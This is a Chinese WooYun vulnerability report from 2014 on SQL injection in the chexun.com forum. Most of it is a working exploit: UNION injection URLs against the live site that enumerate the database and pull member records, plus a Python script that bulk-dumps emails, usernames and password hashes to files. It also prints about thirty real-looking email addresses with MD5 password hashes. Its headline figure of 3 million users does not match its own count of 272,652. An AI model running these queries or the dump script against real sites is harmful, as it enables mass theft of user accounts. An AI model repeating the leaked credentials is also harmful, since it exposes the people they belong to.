当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-078646

漏洞标题:车讯网手工SQL注入可导致300万用户数据泄露(exploit)

相关厂商:车讯网

漏洞作者: menmen519

提交时间:2014-10-08 18:48

修复时间:2014-11-22 18:50

公开时间:2014-11-22 18:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-08: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-11-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

车讯网手工注入300万用户数据泄露(exploit)

详细说明:

1.寻找注入点:
http://bbs.chexun.com/3g/view.php?tid=
id为注入点,此处可以进行所有相关的mysql查询
------------------------------------------------------------------------------------------
2.数据库信息收集
http://bbs.chexun.com/3g/view.php?tid=-655202+UNION+ALL+SELECT+'1',2,3,4,5,6,7,8,group_concat(distinct @@datadir,'|',version(),'|',user(),'|',@@version_compile_os,'|',@@datadir,'|',system_user(),'|',current_user(),'|',session_user(),'|',database()),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20from%20bbs_common_member%20limit%200,1--
数据库:mysql5.5.24-log ------------------------------>version()
用户名:mysql246jmyz@localhost ------------------------------>user()
操作系统:linux ------------------------------>@@version_compile_os
数据库路径:/opt/soft/mysql/data/ ------------------------------>@@datadir
系统用户名:mysql246jmyz@localhost ------------------------------>system_user()
当前用户:mysql246jmyz@localhost ------------------------------>current_user()
连接数据库的用户:mysql246jmyz@localhost ------------------------>session_user()
当前数据库:discuz ------------------------>database()
-------------------------------------------------------------------------------------------
3.爆破数据库
这里由上面的信息,我们判断mysql大于5.x,所以直接爆破数据库表
注解:information_schema数据库是在MYSQL的版本5.0之后产生的,一个虚拟数据库,物理上并不存在。
a.爆出数据库:
http://bbs.chexun.com/3g/view.php?tid=-655202+UNION+ALL+SELECT+'1',2,3,4,5,6,7,8,group_concat(distinct+table_schema,'<br>'),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20from+information_schema.columns--
information_schema
,discuz
,test
b.爆出当前数据库的表名
http://bbs.chexun.com/3g/view.php?tid=-655202+UNION+ALL+SELECT+'1',2,3,4,5,6,7,8,group_concat(distinct+table_name,'<br>'),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20from+information_schema.tables+where+table_schema=database()--
bbs_common_addon
,bbs_common_admincp_cmenu
,bbs_common_admincp_group
,bbs_common_admincp_member
,bbs_common_admincp_perm
,bbs_common_admincp_session
,bbs_common_admingroup
,bbs_common_adminnote
,bbs_common_advertisement
,bbs_common_advertisement_custom
,bbs_common_banned
,bbs_common_block
,bbs_common_block_favorite
,bbs_common_block_item
,bbs_common_block_item_data
,bbs_common_block_permission
,bbs_common_block_pic
,bbs_common_block_style
,bbs_common_block_user_recommend
,bbs_common_block_xml
,bbs_common_cache
,bbs_common_card
,bbs_common_card_log
,bbs_common_card_type
,bbs_common_connect_guest
,bbs_common_credit_log
,bbs_common_credit_log_field
,bbs_common_credit_rule
,bbs_common_credit_rule_log
,bbs_common_credit_rule_log_field
,bbs_common_cron
,bbs_common_devicetoken
,bbs_common_district
,bbs_common_diy_data
,bbs_common_domain
,bbs_common_failedlogin
,bbs_common_friendlink
,bbs_common_grouppm
c.爆出某表的字段
http://bbs.chexun.com/3g/view.php?tid=-655202+UNION+ALL+SELECT+'1',2,3,4,5,6,7,8,group_concat(distinct+column_name,'<br>'),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20from+information_schema.columns+where+table_name='bbs_common_admincp_member'--
uid
,cpgroupid
,customperm
d.爆出某表的数据
http://bbs.chexun.com/3g/view.php?tid=-655202+UNION+ALL+SELECT+'1',2,3,4,5,6,7,8,group_concat(uid,'|',cpgroupid,'|',customperm,'<br>'),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from+bbs_common_admincp_member--
299547|0|
,514916|0|
,515017|0|
,515051|0|
,506839|0|
,428816|0|
,517043|0|
下来我们脱裤子:
由于是dz数据库,我们也知道了表前缀bbs_common_ 那么我们查找bbs_common_member相关的
查询表结构:
http://bbs.chexun.com/3g/view.php?tid=-655202+UNION+ALL+SELECT+'1',2,3,4,5,6,7,8,group_concat(distinct+column_name,'<br>'),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20from+information_schema.columns+where+table_name='bbs_common_member'--
uid
,email
,username
,password
,status
,emailstatus
,avatarstatus
,videophotostatus
,adminid
,groupid
,groupexpiry
,extgroupids
,regdate
,credits
,notifysound
,timeoffset
,newpm
,newprompt
,accessmasks
,allowadmincp
,onlyacceptfriendpm
,conisbind
查询表数据:
http://bbs.chexun.com/3g/view.php?tid=-655202+UNION+ALL+SELECT+'1',2,3,4,5,6,7,8,group_concat(email,'|',username,'|',password,'<br>'),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from+bbs_common_member--
查看一下有多少条数据
http://bbs.chexun.com/3g/view.php?tid=-655202+UNION+ALL+SELECT+'1',2,3,4,5,6,7,8,count(email),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from+bbs_common_member--
结果是272652 万
那么我在一步
http://bbs.chexun.com/3g/view.php?tid=-655202+UNION+ALL+SELECT+'1',2,3,4,5,6,7,8,concat('QQQQ',concat(concat(concat(concat(concat(email,'|'),username),'|'),password),'QQQQ')),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from+bbs_common_member%20limit%200,1--
好了 这个poc写好了
我写一个简单的程序跑一下

import httplib
import re,time
import threading
import traceback
host = "bbs.chexun.com"
pattern = re.compile(r"<xx info=\"([^/><=]*)\" />")
MaxCount = 3000000
#base_url="/3g/view.php?tid=-655202+UNION+ALL+SELECT+'1',2,3,4,5,6,7,8,concat(concat('QQ','QQ'),concat(concat(concat(concat(concat(email,'|'),username),'|'),password),concat('QQ','QQ'))),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from+bbs_common_member+limit+%s,%s--"
base_url="""http://bbs.chexun.com/3g/view.php?tid=-655202+UNION+ALL+SELECT+'1',2,3,4,5,6,7,8,concat(concat('<xx',' info="'),concat(concat(concat(concat(concat(email,'|'),username),'|'),password),concat('" ','/>'))),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from+bbs_common_member+limit+%s,%s--"""
class myThread(threading.Thread):
def __init__(self, name,limit_conut,step_num):
threading.Thread.__init__(self)
self.t_name = name
self.limit_conut = limit_conut
self.step_num = step_num

def go(self):
start = 0+self.step_num
end = MaxCount+self.step_num
conn = httplib.HTTPConnection(host)
filename = self.t_name+".txt"
count = self.limit_conut
f = open(filename,"ab+")

while(count > 0):
try:
time.sleep(3)
url = base_url % (str(start),str(end),)
conn.request("GET", url)

r1 = conn.getresponse()
time.sleep(15)
if(r1.status == 200):
content = r1.read()
txt = pattern.findall(content)
if(txt):
for x in txt:
print "info:%s" % x
f.write(x+"\r\n")
count-=MaxCount
start+=MaxCount
end+=MaxCount
except Exception, e:
print "thread %s is except %s" % (self.t_name,traceback.format_exc(),)
f.close()
conn.close()

def main():
threadnum = 1
dumpname = ["D:/dump111%d"% x for x in range(threadnum)]
tmpnum = MaxCount/len(dumpname)
for x in dumpname:
thread1 = myThread(x,tmpnum,(dumpname.index(x))*tmpnum)
thread1.go()
if __name__== '__main__':
main()
#thread2.start()


这里我没有启用线程!!!简单跑了一下

漏洞证明:

lgdwqvbkcg@163.com|ligd|3b919ce1fb5a2c07a2b901d069beb9c9
systf@163.com|systf|e10adc3949ba59abbe56e057f20f883e
tianlong@163.com|xiaoxiao|e10adc3949ba59abbe56e057f20f883e
susan@163.com|susan|e10adc3949ba59abbe56e057f20f883e
cherry2008@163.com|cherry|e10adc3949ba59abbe56e057f20f883e
xz5610@sina.com|samuraixz|cf89c3602eb691a56ea83e5dde951602
kiki@163.com|kiki|e10adc3949ba59abbe56e057f20f883e
xz5610@sina.com|mustangroy|cf89c3602eb691a56ea83e5dde951602
leehom@163.com|leehom|e10adc3949ba59abbe56e057f20f883e
29238458@qq.com|angel|cf89c3602eb691a56ea83e5dde951602
alex2008@163.com|alex|e10adc3949ba59abbe56e057f20f883e
xz5610@sina.com|godcar|cf89c3602eb691a56ea83e5dde951602
cassiel@163.com|cassiel|e10adc3949ba59abbe56e057f20f883e
xz5610@sina.com|rushour|cf89c3602eb691a56ea83e5dde951602
snow@163.com|snow|e10adc3949ba59abbe56e057f20f883e
xz5610@sina.com|521314|cf89c3602eb691a56ea83e5dde951602
xz5610@sina.com|lockcar|cf89c3602eb691a56ea83e5dde951602
easter@163.com|easter|e10adc3949ba59abbe56e057f20f883e
xz5610@sina.com|yomi|cf89c3602eb691a56ea83e5dde951602
xz5610@sina.com|onelife|cf89c3602eb691a56ea83e5dde951602
xz5610@sina.com|sharp|cf89c3602eb691a56ea83e5dde951602
sprhb520@126.com|sprhb|8c29dccc44f424afe1a83676a740caa5
stevenzhangyin@hotmail.com|TTbag|07e2bca8864f7579c7760d9ccbcde870
957980995@QQ.com|feifei|4411d8ff8fe9ff1f0593e6739703a5a1
247021555@qq.com|bigbeesheep|25f9e794323b453885f5181f1b624d0b
bbbb@163.com|bbbb|e10adc3949ba59abbe56e057f20f883e
bantiandiao@163.com|0000|5652c795ec17db83518cff3d7a69ff99
gba_2005@sina.com|zhoukai|e807f1fcf82d132f9bb018ca6738a19f
r@126.com|ding|6c2c87839dc62c944dc51be25b80c1ea
u@126.com|zhang|6c2c87839dc62c944dc51be25b80c1ea
sundi1117@yahoo.com|bjyazx01|e10adc3949ba59abbe56e057f20f883e

修复方案:

版权声明:转载请注明来源 menmen519@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论

  1. 2014-10-08 19:46 | 铁蛋火车侠 ( 普通白帽子 | Rank:156 漏洞数:31 | Q群371620085 技术交流群 有漂亮妹纸!)

    无人认领

  2. 2014-11-22 19:01 | 小学猹 ( 实习白帽子 | Rank:81 漏洞数:30 | 暮春者,春服既成,冠者五六人,童子六七人...)

    =.= 明明只有27w